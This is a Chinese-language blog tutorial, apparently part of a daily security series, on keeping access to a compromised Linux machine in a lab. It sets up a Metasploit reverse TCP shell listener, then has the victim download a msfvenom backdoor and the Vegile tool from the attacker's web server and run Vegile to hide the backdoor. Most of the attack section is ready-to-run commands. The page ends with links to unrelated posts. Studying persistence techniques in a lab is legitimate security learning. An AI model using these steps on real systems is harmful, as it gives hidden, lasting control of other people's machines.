【Day25】维持权限 — 隐藏後门(二)

哈罗~
昨天我们用msfvenom建立了一个後门,
将其传送到受害端的主机,
只要受害端运行了该程序,
就会建立TCP连线,并自动连回我们的主机。
我们便可以透过连线来控制目标。
另外,也透过git clone把Vegile下载到电脑。

今天就来接续昨天的实作吧~/images/emoticon/emoticon37.gif

环境:
Kali ─ 攻击方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)

攻击端准备

  1. 将昨天的 後门 & Vegile 都移至/var/ww/html目录下。

     cp backdoor /var/www/html
     cp -r Vegile /var/www/html
    


    为了模拟从受害端连回去server下载工具,记得要启动apache

    systemctl start apache2
    

  2. 接下来我们执行msf控制台,使用exploit/multi/handler开始监听

    msfconsole
    use exploit/multi/handler
    set payload linux/x64/shell/reverse_tcp
    set lhost [要连回的攻击者ip]
    set lport 777
    run
    

取得受害端权限後

  1. 当我们已进入目标系统,可使用wget来下载我们step.1放到/var/www/html上的档案。
    wget [攻击者ip]/Vegile
    wget [攻击者ip]/backdoor
    


  2. 之後执行Vegile --i backdoor时发现有错误...

    因为要隐藏的後门档案,需放置在Vegile目录下...
    於是我用cp直接复制过去...(๑¯∀¯๑)
  3. 让我们再次确认Vegile & backdoor有在同个目录~
  4. 使用chmod,将档案改为可执行档。
    chmod +x Vegile
    chmod +x backdoor
    
  5. 透过Vegile来隐藏後门档案
    ./Vegile --i backdoor
    
  6. 回到我们攻击者的电脑,可以看到有来自受害端的连线,表示攻击成功

小结

Vegile这个工具的指令其实很简单,
只有以下三个参数:

参数 说明
-i 隐藏後门
-u 开启无限Session
-h 功能查询

走罗! 高歌离席~/images/emoticon/emoticon29.gif


<<:  看焰火罗~ Vaadin 内嵌 iFrame 不跑版自动缩放 - day25

>>:  自我成长书单分享

JS 标签样板字面值 DAY76

在我们使用 标签样板字面值 可解决 XSS攻击 这里我们先来介绍简单的 标签样板字面值 依据在样板字...

[Re:PixiJS - Day44] pixi-particles 粒子效果 2/2:实作应用

接续昨天的介绍,再加入一些控制与互动 今日 Demo / 参考效果:奇异博士 只要能用程序控制的,就...

Day-01 一个从零开始转职程序工程师的故事

这张照片是程序视讯课的背景图,3月时在山上人家拍的樱花 相信这类的转职故事大家应该看过很多吧? 但...

[Day10] Vite 出小蜜蜂~Function Composition!

Day10 接下来,要帮 Squid 也装上 Laser, 敌人的 Laser 跟我们的外观是不一样...

如何修复“硬碟仅显示一半容量”

通过本文,您将能够解决Windows 10/8/7中的“硬碟仅显示少量容量”问题,并使用“Bitwa...